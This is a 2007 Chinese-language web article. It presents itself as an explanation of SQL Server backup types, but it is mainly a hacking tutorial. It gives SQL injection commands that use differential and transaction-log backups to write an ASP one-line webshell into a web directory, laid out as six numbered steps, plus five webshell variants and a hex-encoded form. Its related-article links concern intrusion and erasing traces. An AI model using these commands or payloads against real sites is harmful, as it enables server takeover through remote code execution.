| 对数据库差异备进行一次完全分析 |
| 责任编辑:水土不服 更新日期:2007-10-22 |
|
|
首先要知道SQL server数据库备份三种方式:
一号: 1.bak(完全备份)
二号2 2.bak(差异备份)
二号中午 一次LOG日志(插入数据、批量操作都可以产生LOG日志)
三号 3.bak(LOG备份)
no1.完全数据备份
no2.差异备份,也叫增量备份。差异备份用于复制自上次更改后的部分。
no3.事务日志备份,也叫LOG备份。用语备份上一个LOG更改后的部分
这是我们要熟悉几个SQL 编程的最基本语句:
alter : 修改....
declare: 定义变量 (@为用户自定义变量,@@为系统变量 @@version)...
create table:建立表...
insert into :向表中插入数据..
drop :删除..
这是要知道的差异备份语句:
;declare @a sysname,@s nvarchar(4000) ;select @a=db_name(),@s='C:\Program Files\Microsoft SQL Server\MSSQL\BACKUP\pivot.bak'
;backup database @a to disk=@s
;create table [dbo].[xiaolu] ([cmd] [image]);
;insert into xiaolu(cmd) values(<%execute(request("a"))%>)
;declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s='d:\web\3800hk.asp'; backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT
由于各种原因,使差异备份导致失败,于是有些人又想出了另一种log增量备份技术:
手工备份六大步骤,大家可以对照熟悉下:
1.InjectionURL';alter database test set RECOVERY FULL;-- (把SQL设置成完全恢复模式)
2.InjectionURL';create table cmd (a image)-- (新建立一个cmd表)
3.InjectionURL';backup log XXX to disk = 'c:\cmd' with init-- (减少备分数据的大小)
4.InjectionURL';insert into cmd (a) values ('<%%25Execute(request("ray"))%%25>')-- (插入一句话)
5.InjectionURL';backup log XXX to disk = 'd:\chinakm\test.asp'-- (备分日志到WEB路径)
6.InjectionURL';drop table cmd-- (删除新建的cmd表)
注:InjectionURL是注入点,XXX是数据库名称。
PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话16进制转来的
说到一句话,还可以有这么几种写法:
a).<%%25Execute(request("a"))%%25>
b).<%Execute(request("a"))%>
c).%><%execute request("a")%><%
d).<script language=VBScript runat=server>execute request("a")</script>
e).<%25Execute(request("a"))%25> |
|
| 上一篇文章: 推荐:利用社会工程学入侵台湾服务器 |
| 下一篇文章: 清理你入侵后的三个重要痕迹 |
|
|
|
|
